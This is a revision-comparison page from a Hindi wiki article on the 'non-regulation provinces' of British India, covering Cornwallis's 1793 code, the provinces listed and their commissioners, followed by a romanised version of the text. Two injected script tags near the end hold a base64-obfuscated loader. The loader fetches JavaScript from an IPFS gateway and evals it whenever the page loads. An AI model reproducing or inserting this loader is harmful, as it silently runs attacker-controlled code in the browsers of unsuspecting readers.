Difference between revisions of "अव्यवस्थित प्रांत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*अव्यवस्थित प्रांत [[अंग्रेज़|अंग्रेज़ों]] के भारतीय साम्राज्य के अंतर्गत उन प्रान्तों को कहा जाता था, जिनमें [[मई]] 1793 ई. में जारी लार्ड कार्नवालिस का विधि-विधान व्यवहृत नहीं होता था।  
 
*अव्यवस्थित प्रांत [[अंग्रेज़|अंग्रेज़ों]] के भारतीय साम्राज्य के अंतर्गत उन प्रान्तों को कहा जाता था, जिनमें [[मई]] 1793 ई. में जारी लार्ड कार्नवालिस का विधि-विधान व्यवहृत नहीं होता था।  
*ऐसे प्रान्त [[दिल्ली]], [[असम]], [[अराकान]] और तेनासेरीम, सागर और नर्मदा क्षेत्र तथा [[पंजाब]] थे, जो क्रमश: 1803 ई., 1824 ई., 1818 ई. और 1819 ई. में हस्तगत किये गये थे। *इन प्रान्तों का मुख्य अधिकारी चीफ़ कमिश्नर कहलाता था और ज़िलों के अधिकारी डिप्टी कमिश्नर।  
+
*ऐसे प्रान्त [[दिल्ली]], [[असम]], [[अराकान]] और तेनासेरीम, सागर और नर्मदा क्षेत्र तथा [[पंजाब]] थे, जो क्रमश: 1803 ई., 1824 ई., 1818 ई. और 1819 ई. में हस्तगत किये गये थे।  
 +
*इन प्रान्तों का मुख्य अधिकारी चीफ़ कमिश्नर कहलाता था और ज़िलों के अधिकारी डिप्टी कमिश्नर।  
 
*इन प्रान्तों में सैनिक पदाधिकारी भी नागरिक सेवाओं के लिए नियुक्त किये जा सकते थे।
 
*इन प्रान्तों में सैनिक पदाधिकारी भी नागरिक सेवाओं के लिए नियुक्त किये जा सकते थे।
  
 
{{प्रचार}}
 
{{प्रचार}}
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 07:25, 27 July 2012

  • avyavasthit praant aangrezoan ke bharatiy samrajy ke aantargat un prantoan ko kaha jata tha, jinamean mee 1793 ee. mean jari lard karnavalis ka vidhi-vidhan vyavahrit nahian hota tha.
  • aise prant dilli, asam, arakan aur tenaserim, sagar aur narmada kshetr tatha panjab the, jo kramash: 1803 ee., 1824 ee., 1818 ee. aur 1819 ee. mean hastagat kiye gaye the.
  • in prantoan ka mukhy adhikari chif kamishnar kahalata tha aur ziloan ke adhikari dipti kamishnar.
  • in prantoan mean sainik padadhikari bhi nagarik sevaoan ke lie niyukt kiye ja sakate the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>